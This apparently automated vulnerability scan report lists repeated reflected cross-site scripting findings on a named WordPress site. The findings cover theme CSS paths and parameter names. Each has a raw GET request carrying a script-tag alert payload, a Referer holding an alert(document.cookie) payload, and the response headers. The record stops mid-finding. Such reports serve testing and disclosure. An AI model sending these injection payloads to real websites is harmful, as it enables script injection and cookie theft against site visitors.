GET /wp-content/themes/rt_mynxx_wp/css/light.css2c386"><script>alert(1)</script>a3110606fc HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:42 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.197. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.installsoftware.com
Path:
/wp-content/themes/rt_mynxx_wp/css/light.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eac4c"><script>alert(1)</script>ba25096ea8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eac4c\"><script>alert(1)</script>ba25096ea8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css/light.css?eac4c"><script>alert(1)</script>ba25096ea8d=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:12:41 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:12:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44412
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4c4e"><script>alert(1)</script>67f90b47a97 was submitted in the REST URL parameter 1. This input was echoed as b4c4e\"><script>alert(1)</script>67f90b47a97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentb4c4e"><script>alert(1)</script>67f90b47a97/themes/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:01 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bcf4"><script>alert(1)</script>f3abb3d23ef was submitted in the REST URL parameter 2. This input was echoed as 2bcf4\"><script>alert(1)</script>f3abb3d23ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes2bcf4"><script>alert(1)</script>f3abb3d23ef/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:13 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb741"><script>alert(1)</script>99ae03579d0 was submitted in the REST URL parameter 3. This input was echoed as eb741\"><script>alert(1)</script>99ae03579d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wpeb741"><script>alert(1)</script>99ae03579d0/css/rokmoomenu.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:25 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d4b"><script>alert(1)</script>cf7dabca00c was submitted in the REST URL parameter 4. This input was echoed as d8d4b\"><script>alert(1)</script>cf7dabca00c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/cssd8d4b"><script>alert(1)</script>cf7dabca00c/rokmoomenu.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:28 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5fa5"><script>alert(1)</script>d67de01ff03 was submitted in the REST URL parameter 5. This input was echoed as f5fa5\"><script>alert(1)</script>d67de01ff03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.cssf5fa5"><script>alert(1)</script>d67de01ff03 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:41 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.203. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.installsoftware.com
Path:
/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 758e2"><script>alert(1)</script>4b8bc89c082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 758e2\"><script>alert(1)</script>4b8bc89c082 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css?758e2"><script>alert(1)</script>4b8bc89c082=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:12:41 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:12:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4981c"><script>alert(1)</script>b15b61d6299 was submitted in the REST URL parameter 1. This input was echoed as 4981c\"><script>alert(1)</script>b15b61d6299 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content4981c"><script>alert(1)</script>b15b61d6299/themes/rt_mynxx_wp/css/template.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:15:53 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:15:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8683c"><script>alert(1)</script>bcd24929a4c was submitted in the REST URL parameter 2. This input was echoed as 8683c\"><script>alert(1)</script>bcd24929a4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes8683c"><script>alert(1)</script>bcd24929a4c/rt_mynxx_wp/css/template.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:16:06 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:16:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4df"><script>alert(1)</script>0c240e70acf was submitted in the REST URL parameter 3. This input was echoed as 7b4df\"><script>alert(1)</script>0c240e70acf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp7b4df"><script>alert(1)</script>0c240e70acf/css/template.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:16:39 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:16:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a88e"><script>alert(1)</script>a859c781526 was submitted in the REST URL parameter 4. This input was echoed as 7a88e\"><script>alert(1)</script>a859c781526 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css7a88e"><script>alert(1)</script>a859c781526/template.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:01 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a7a5"><script>alert(1)</script>b62332fda7c was submitted in the REST URL parameter 5. This input was echoed as 4a7a5\"><script>alert(1)</script>b62332fda7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css/template.css4a7a5"><script>alert(1)</script>b62332fda7c HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:13 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.209. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.installsoftware.com
Path:
/wp-content/themes/rt_mynxx_wp/css/template.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd965"><script>alert(1)</script>e1be0e8eba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd965\"><script>alert(1)</script>e1be0e8eba4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css/template.css?bd965"><script>alert(1)</script>e1be0e8eba4=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:14:23 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:14:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44418
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a40c"><script>alert(1)</script>edd1009451f was submitted in the REST URL parameter 1. This input was echoed as 9a40c\"><script>alert(1)</script>edd1009451f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content9a40c"><script>alert(1)</script>edd1009451f/themes/rt_mynxx_wp/css/typography.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:07 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f80"><script>alert(1)</script>99d09042358 was submitted in the REST URL parameter 2. This input was echoed as a1f80\"><script>alert(1)</script>99d09042358 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themesa1f80"><script>alert(1)</script>99d09042358/rt_mynxx_wp/css/typography.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
